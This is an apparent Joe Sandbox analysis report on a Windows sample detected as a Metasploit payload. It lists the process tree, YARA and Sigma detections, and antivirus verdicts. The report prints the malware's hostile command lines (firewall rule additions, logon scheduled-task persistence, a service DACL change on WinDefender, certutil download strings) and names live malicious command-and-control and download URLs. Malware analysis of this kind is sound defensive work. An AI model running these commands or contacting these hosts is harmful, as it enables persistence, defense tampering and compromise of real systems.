Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report jkDmft1Qoe

Overview

General Information

Sample Name:jkDmft1Qoe (renamed file extension from none to exe)
Analysis ID:504422
MD5:099ad37ceccdfa74229d976b10973736
SHA1:1b6d65319dcb21fa94310c04bc3abd89b90b4699
SHA256:df84d3e83b4105f9178e518ca69e1a2ec3116d3223003857d892b8a6f64b05ba
Tags:32exe
Infos:

Most interesting Screenshot:

Detection

Metasploit
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Metasploit Payload
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Creates an autostart registry key pointing to binary in C:\Windows
Sigma detected: System File Execution Location Anomaly
Uses netsh to modify the Windows network and firewall settings
Found Tor onion address
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses shutdown.exe to shutdown or reboot the system
Machine Learning detection for sample
Creates files in the system32 config directory
May modify the system service descriptor table (often done to hook functions)
Machine Learning detection for dropped file
Modifies the windows firewall
Contains functionality to inject threads in other processes
Performs DNS TXT record lookups
Sigma detected: Suspicious Service DACL Modification
Drops executables to the windows directory (C:\Windows) and starts them
Uses schtasks.exe or at.exe to add and modify task schedules
Drops PE files with benign system names
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
PE file contains sections with non-standard names
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Downloads executable code via HTTP
Enables debug privileges
Is looking for software installed on the system
Drops files with a non-matching file extension (content does not match file extension)
PE file does not import any functions
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Drops PE files
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Contains capabilities to detect virtual machines
Enables security privileges
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Sigma detected: Netsh Port or Application Allowed
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • jkDmft1Qoe.exe (PID: 7032 cmdline: 'C:\Users\user\Desktop\jkDmft1Qoe.exe' MD5: 099AD37CECCDFA74229D976B10973736)
    • jkDmft1Qoe.exe (PID: 3176 cmdline: C:\Users\user\Desktop\jkDmft1Qoe.exe MD5: 099AD37CECCDFA74229D976B10973736)
      • cmd.exe (PID: 4420 cmdline: C:\Windows\Sysnative\cmd.exe /C 'netsh advfirewall firewall add rule name='csrss' dir=in action=allow program='C:\Windows\rss\csrss.exe' enable=yes' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 4476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • netsh.exe (PID: 6380 cmdline: netsh advfirewall firewall add rule name='csrss' dir=in action=allow program='C:\Windows\rss\csrss.exe' enable=yes MD5: 98CC37BBF363A38834253E22C80A8F32)
        • conhost.exe (PID: 4476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csrss.exe (PID: 4612 cmdline: C:\Windows\rss\csrss.exe '' MD5: 099AD37CECCDFA74229D976B10973736)
        • schtasks.exe (PID: 5396 cmdline: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR 'C:\Windows\rss\csrss.exe' /TN csrss /F MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
          • conhost.exe (PID: 4648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 5556 cmdline: schtasks /delete /tn ScheduledUpdate /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
          • conhost.exe (PID: 6700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • mountvol.exe (PID: 5704 cmdline: mountvol B: /s MD5: 5C11B99E6D41403031CD946255E8A353)
          • conhost.exe (PID: 2792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • mountvol.exe (PID: 6684 cmdline: mountvol B: /d MD5: 5C11B99E6D41403031CD946255E8A353)
          • conhost.exe (PID: 6756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • mountvol.exe (PID: 7152 cmdline: mountvol B: /s MD5: 5C11B99E6D41403031CD946255E8A353)
          • conhost.exe (PID: 1492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • mountvol.exe (PID: 7044 cmdline: mountvol B: /d MD5: 5C11B99E6D41403031CD946255E8A353)
          • conhost.exe (PID: 7064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • shutdown.exe (PID: 4420 cmdline: shutdown -r -t 5 MD5: E2EB9CC0FE26E28406FB6F82F8E81B26)
        • injector.exe (PID: 1332 cmdline: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll MD5: D98E33B66343E7C96158444127A117F6)
          • conhost.exe (PID: 1900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • windefender.exe (PID: 5628 cmdline: C:\Windows\windefender.exe MD5: E0A50C60A85BFBB9ECF45BFF0239AAA3)
          • conhost.exe (PID: 5692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 6140 cmdline: cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD) MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • sc.exe (PID: 5188 cmdline: sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD) MD5: 24A3E2603E63BCB9695A2935D3B24695)
  • TrustedInstaller.exe (PID: 7128 cmdline: C:\Windows\servicing\TrustedInstaller.exe MD5: 4578046C54A954C917BB393B70BA0AEB)
  • csrss.exe (PID: 6708 cmdline: C:\Windows\rss\csrss.exe MD5: 099AD37CECCDFA74229D976B10973736)
    • csrss.exe (PID: 7116 cmdline: C:\Windows\rss\csrss.exe MD5: 099AD37CECCDFA74229D976B10973736)
  • csrss.exe (PID: 6860 cmdline: 'C:\Windows\rss\csrss.exe' MD5: 099AD37CECCDFA74229D976B10973736)
    • csrss.exe (PID: 616 cmdline: C:\Windows\rss\csrss.exe MD5: 099AD37CECCDFA74229D976B10973736)
  • svchost.exe (PID: 6356 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • csrss.exe (PID: 5472 cmdline: 'C:\Windows\rss\csrss.exe' MD5: 099AD37CECCDFA74229D976B10973736)
    • csrss.exe (PID: 4552 cmdline: C:\Windows\rss\csrss.exe MD5: 099AD37CECCDFA74229D976B10973736)
  • svchost.exe (PID: 4564 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4904 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6352 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • windefender.exe (PID: 496 cmdline: C:\Windows\windefender.exe MD5: E0A50C60A85BFBB9ECF45BFF0239AAA3)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
jkDmft1Qoe.exeJoeSecurity_MetasploitPayload_3Yara detected Metasploit PayloadJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Windows\rss\csrss.exeJoeSecurity_MetasploitPayload_3Yara detected Metasploit PayloadJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      0000001C.00000002.706688357.0000000000991000.00000008.00020000.sdmpCertutil_Decode_OR_DownloadCertutil DecodeFlorian Roth
      • 0xda4a:$a6: certutil.exe -urlcache -split -f http
      • 0xdec8:$a6: certutil.exe -urlcache -split -f http
      0000001C.00000002.706688357.0000000000991000.00000008.00020000.sdmpJoeSecurity_MetasploitPayload_3Yara detected Metasploit PayloadJoe Security
        00000020.00000000.714633232.000000000098A000.00000008.00020000.sdmpCertutil_Decode_OR_DownloadCertutil DecodeFlorian Roth
        • 0x14a4a:$a6: certutil.exe -urlcache -split -f http
        • 0x14ec8:$a6: certutil.exe -urlcache -split -f http
        00000020.00000000.714633232.000000000098A000.00000008.00020000.sdmpJoeSecurity_MetasploitPayload_3Yara detected Metasploit PayloadJoe Security
          00000016.00000002.701157645.0000000000991000.00000008.00020000.sdmpCertutil_Decode_OR_DownloadCertutil DecodeFlorian Roth
          • 0xda4a:$a6: certutil.exe -urlcache -split -f http
          • 0xdec8:$a6: certutil.exe -urlcache -split -f http
          Click to see the 31 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          34.0.csrss.exe.9a7760.2.raw.unpackMAL_ME_RawDisk_Agent_Jan20_2Detects suspicious malware using ElRawDiskFlorian Roth
          • 0x444b8:$s2: The Magic Word!
          • 0x505f8:$s2: The Magic Word!
          • 0x44818:$s3: Software\Oracle\VirtualBox
          • 0x444a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
          4.0.jkDmft1Qoe.exe.9af360.3.raw.unpackMAL_ME_RawDisk_Agent_Jan20_2Detects suspicious malware using ElRawDiskFlorian Roth
          • 0x3c8b8:$s2: The Magic Word!
          • 0x489f8:$s2: The Magic Word!
          • 0x3cc18:$s3: Software\Oracle\VirtualBox
          • 0x3c8a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
          34.2.csrss.exe.9a7760.2.raw.unpackMAL_ME_RawDisk_Agent_Jan20_2Detects suspicious malware using ElRawDiskFlorian Roth
          • 0x444b8:$s2: The Magic Word!
          • 0x505f8:$s2: The Magic Word!
          • 0x44818:$s3: Software\Oracle\VirtualBox
          • 0x444a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
          32.2.csrss.exe.9a7760.1.raw.unpackMAL_ME_RawDisk_Agent_Jan20_2Detects suspicious malware using ElRawDiskFlorian Roth
          • 0x444b8:$s2: The Magic Word!
          • 0x505f8:$s2: The Magic Word!
          • 0x44818:$s3: Software\Oracle\VirtualBox
          • 0x444a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
          0.2.jkDmft1Qoe.exe.9a7760.1.raw.unpackMAL_ME_RawDisk_Agent_Jan20_2Detects suspicious malware using ElRawDiskFlorian Roth
          • 0x444b8:$s2: The Magic Word!
          • 0x505f8:$s2: The Magic Word!
          • 0x44818:$s3: Software\Oracle\VirtualBox
          • 0x444a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
          Click to see the 67 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: System File Execution Location AnomalyShow sources
          Source: Process startedAuthor: Florian Roth, Patrick Bareiss, Anton Kutepov, oscd.community: Data: Command: C:\Windows\rss\csrss.exe '', CommandLine: C:\Windows\rss\csrss.exe '', CommandLine|base64offset|contains: , Image: C:\Windows\rss\csrss.exe, NewProcessName: C:\Windows\rss\csrss.exe, OriginalFileName: C:\Windows\rss\csrss.exe, ParentCommandLine: C:\Users\user\Desktop\jkDmft1Qoe.exe, ParentImage: C:\Users\user\Desktop\jkDmft1Qoe.exe, ParentProcessId: 3176, ProcessCommandLine: C:\Windows\rss\csrss.exe '', ProcessId: 4612
          Sigma detected: Suspicious Service DACL ModificationShow sources
          Source: Process startedAuthor: Jonhnathan Ribeiro, oscd.community: Data: Command: sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD), CommandLine: sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD), CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\sc.exe, NewProcessName: C:\Windows\SysWOW64\sc.exe, OriginalFileName: C:\Windows\SysWOW64\sc.exe, ParentCommandLine: cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD), ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6140, ProcessCommandLine: sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD), ProcessId: 5188
          Sigma detected: Netsh Port or Application AllowedShow sources
          Source: Process startedAuthor: Markus Neis, Sander Wiebing: Data: Command: netsh advfirewall firewall add rule name='csrss' dir=in action=allow program='C:\Windows\rss\csrss.exe' enable=yes, CommandLine: netsh advfirewall firewall add rule name='csrss' dir=in action=allow program='C:\Windows\rss\csrss.exe' enable=yes, CommandLine|base64offset|contains: l, Image: C:\Windows\System32\netsh.exe, NewProcessName: C:\Windows\System32\netsh.exe, OriginalFileName: C:\Windows\System32\netsh.exe, ParentCommandLine: C:\Windows\Sysnative\cmd.exe /C 'netsh advfirewall firewall add rule name='csrss' dir=in action=allow program='C:\Windows\rss\csrss.exe' enable=yes', ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4420, ProcessCommandLine: netsh advfirewall firewall add rule name='csrss' dir=in action=allow program='C:\Windows\rss\csrss.exe' enable=yes, ProcessId: 6380
          Sigma detected: Windows Processes Suspicious Parent DirectoryShow sources
          Source: Process startedAuthor: vburov: Data: Command: C:\Windows\rss\csrss.exe '', CommandLine: C:\Windows\rss\csrss.exe '', CommandLine|base64offset|contains: , Image: C:\Windows\rss\csrss.exe, NewProcessName: C:\Windows\rss\csrss.exe, OriginalFileName: C:\Windows\rss\csrss.exe, ParentCommandLine: C:\Users\user\Desktop\jkDmft1Qoe.exe, ParentImage: C:\Users\user\Desktop\jkDmft1Qoe.exe, ParentProcessId: 3176, ProcessCommandLine: C:\Windows\rss\csrss.exe '', ProcessId: 4612

          Persistence and Installation Behavior:

          barindex
          Sigma detected: Schedule system processShow sources
          Source: Process startedAuthor: Joe Security: Data: Command: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR 'C:\Windows\rss\csrss.exe' /TN csrss /F, CommandLine: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR 'C:\Windows\rss\csrss.exe' /TN csrss /F, CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: C:\Windows\rss\csrss.exe '', ParentImage: C:\Windows\rss\csrss.exe, ParentProcessId: 4612, ProcessCommandLine: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR 'C:\Windows\rss\csrss.exe' /TN csrss /F, ProcessId: 5396

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Multi AV Scanner detection for submitted fileShow sources
          Source: jkDmft1Qoe.exeVirustotal: Detection: 57%Perma Link
          Source: jkDmft1Qoe.exeMetadefender: Detection: 34%Perma Link
          Source: jkDmft1Qoe.exeReversingLabs: Detection: 46%
          Antivirus detection for URL or domainShow sources
          Source: https://trumops.com/api/logGlobalAvira URL Cloud: Label: malware
          Source: http://gohnot.com/370c4779d730135afa0e64399be9936c%Avira URL Cloud: Label: malware
          Source: https://logs.trumops.comAvira URL Cloud: Label: malware
          Source: https://server1.trumops.com/api/pollserver1.trumops.comAvira URL Cloud: Label: malware
          Source: https://trumops.com/api/logdefaultAvira URL Cloud: Label: malware
          Source: http://gohnot.com/370c4779d730135afa0e64399be9936cAvira URL Cloud: Label: malware
          Source: https://server1.trumops.com/api/poll40ghzAvira URL Cloud: Label: malware
          Source: https://server1.trumops.com/api/pollAvira URL Cloud: Label: malware
          Source: https://server1.trumops.com/api/poll40ghzserver1.trumops.comAvira URL Cloud: Label: malware
          Source: https://server1.trumops.comAvira URL Cloud: Label: malware
          Source: https://server1.trumops.com/api/cdn?c=1a0ceff6e935c933&uuid=8db1a514-f568-41bf-af6a-dffb7cea0346Avira URL Cloud: Label: malware
          Source: http://newscommer.com/app/app.exeURL Reputation: Label: malware
          Source: http://gohnot.com/370c4779d730135afa0e64399be9936c/watchdog.exeAvira URL Cloud: Label: malware
          Source: https://trumops.comAvira URL Cloud: Label: malware
          Source: https://trumops.com/api/logAvira URL Cloud: Label: malware
          Source: https://trumops.com/api/logmountvol.commountvol.exemountvol.batmountvol.cmdmountvol.vbsmountvol.vbemAvira URL Cloud: Label: malware
          Source: https://server1.trumops.com/bots/post-ia-data?uuid=8db1a514-f568-41bf-af6a-dffb7cea0346Avira URL Cloud: Label: malware
          Multi AV Scanner detection for domain / URLShow sources
          Source: gohnot.comVirustotal: Detection: 5%Perma Link
          Source: server1.trumops.comVirustotal: Detection: 5%Perma Link
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dllMetadefender: Detection: 45%Perma Link
          Source: C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dllReversingLabs: Detection: 59%
          Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeMetadefender: Detection: 13%Perma Link
          Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeReversingLabs: Detection: 73%
          Source: C:\Windows\rss\csrss.exeMetadefender: Detection: 34%Perma Link
          Source: C:\Windows\rss\csrss.exeReversingLabs: Detection: 46%
          Source: C:\Windows\windefender.exeReversingLabs: Detection: 40%
          Machine Learning detection for sampleShow sources
          Source: jkDmft1Qoe.exeJoe Sandbox ML: detected
          Machine Learning detection for dropped fileShow sources
          Source: C:\Windows\rss\csrss.exeJoe Sandbox ML: detected
          Source: 10.3.csrss.exe.11920c00.9.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 10.2.csrss.exe.11c1c000.10.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 10.2.csrss.exe.11b9c000.9.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: jkDmft1Qoe.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DEBUG_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: Loader.pdb source: jkDmft1Qoe.exe, 00000000.00000002.666674298.0000000000991000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000000.665063886.000000000098A000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675526345.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.682958367.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688486387.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000019.00000000.696859429.000000000098A000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706688357.0000000000991000.00000008.00020000.sdmp, csrss.exe, 00000020.00000000.714633232.000000000098A000.00000008.00020000.sdmp
          Source: Binary string: Unrecognized pdb formatThis error indicates attempting to access a .pdb file with source: jkDmft1Qoe.exe, 00000000.00000002.667384798.0000000000A5B000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000002.678696711.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675695591.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.683098871.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688601668.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000019.00000002.706532786.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706799259.0000000000A5B000.00000008.00020000.sdmp
          Source: Binary string: A connection with the server could not be establishedAn extended error was returned from the WinHttp serverThe .pdb file is probably no longer indexed in the symbol server share location. source: jkDmft1Qoe.exe, 00000000.00000002.667384798.0000000000A5B000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000002.678696711.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675695591.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.683098871.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688601668.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000019.00000002.706532786.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706799259.0000000000A5B000.00000008.00020000.sdmp
          Source: Binary string: Age does not matchThe module age and .pdb age do not match. source: jkDmft1Qoe.exe, 00000000.00000002.667384798.0000000000A5B000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000002.678696711.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675695591.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.683098871.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688601668.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000019.00000002.706532786.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706799259.0000000000A5B000.00000008.00020000.sdmp
          Source: Binary string: symsrv.pdb source: jkDmft1Qoe.exe, 00000000.00000002.668856780.0000000000C57000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000000.665347802.0000000000C57000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.676233642.0000000000C57000.00000008.00020000.sdmp, csrss.exe, 00000011.00000002.701096602.0000000000C57000.00000008.00020000.sdmp, csrss.exe, 00000016.00000002.702361556.0000000000C57000.00000008.00020000.sdmp, csrss.exe, 00000019.00000000.697442468.0000000000C57000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.707266801.0000000000C57000.00000008.00020000.sdmp
          Source: Binary string: Cvinfo is corruptThe .pdb file contains a corrupted debug codeview information. source: jkDmft1Qoe.exe, 00000000.00000002.667384798.0000000000A5B000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000002.678696711.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675695591.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.683098871.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688601668.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000019.00000002.706532786.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706799259.0000000000A5B000.00000008.00020000.sdmp
          Source: Binary string: C:\Users\mac\Desktop\driver-process-monitor\x64\Release\WinmonProcessMonitor.pdb source: jkDmft1Qoe.exe, 00000000.00000002.666674298.0000000000991000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000000.665063886.000000000098A000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675526345.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.682958367.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688486387.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000019.00000000.696859429.000000000098A000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706688357.0000000000991000.00000008.00020000.sdmp, csrss.exe, 00000020.00000000.714633232.000000000098A000.00000008.00020000.sdmp
          Source: Binary string: Downloading symbols for [%s] %ssrv*symsrv*http://https://_bad_pdb_file.pdb source: jkDmft1Qoe.exe, 00000000.00000002.667384798.0000000000A5B000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000002.678696711.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675695591.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.683098871.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688601668.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000019.00000002.706532786.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706799259.0000000000A5B000.00000008.00020000.sdmp
          Source: Binary string: The symbol server has never indexed any version of this symbol fileNo version of the .pdb file with the given name has ever been registered. source: jkDmft1Qoe.exe, 00000000.00000002.667384798.0000000000A5B000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000002.678696711.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675695591.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.683098871.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688601668.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000019.00000002.706532786.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706799259.0000000000A5B000.00000008.00020000.sdmp
          Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win7x64\x64\Release\SSDTHook.pdb source: jkDmft1Qoe.exe, 00000000.00000002.666674298.0000000000991000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000000.665063886.000000000098A000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675526345.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.682958367.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688486387.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000019.00000000.696859429.000000000098A000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706688357.0000000000991000.00000008.00020000.sdmp, csrss.exe, 00000020.00000000.714633232.000000000098A000.00000008.00020000.sdmp
          Source: Binary string: PDB not foundUnable to locate the .pdb file in any of the symbol search path locations. source: jkDmft1Qoe.exe, 00000000.00000002.667384798.0000000000A5B000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000002.678696711.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675695591.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.683098871.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688601668.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000019.00000002.706532786.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706799259.0000000000A5B000.00000008.00020000.sdmp
          Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\Release\Winmon.pdb source: jkDmft1Qoe.exe, 00000000.00000002.666674298.0000000000991000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000000.665063886.000000000098A000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675526345.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.682958367.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688486387.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000019.00000000.696859429.000000000098A000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706688357.0000000000991000.00000008.00020000.sdmp, csrss.exe, 00000020.00000000.714633232.000000000098A000.00000008.00020000.sdmp
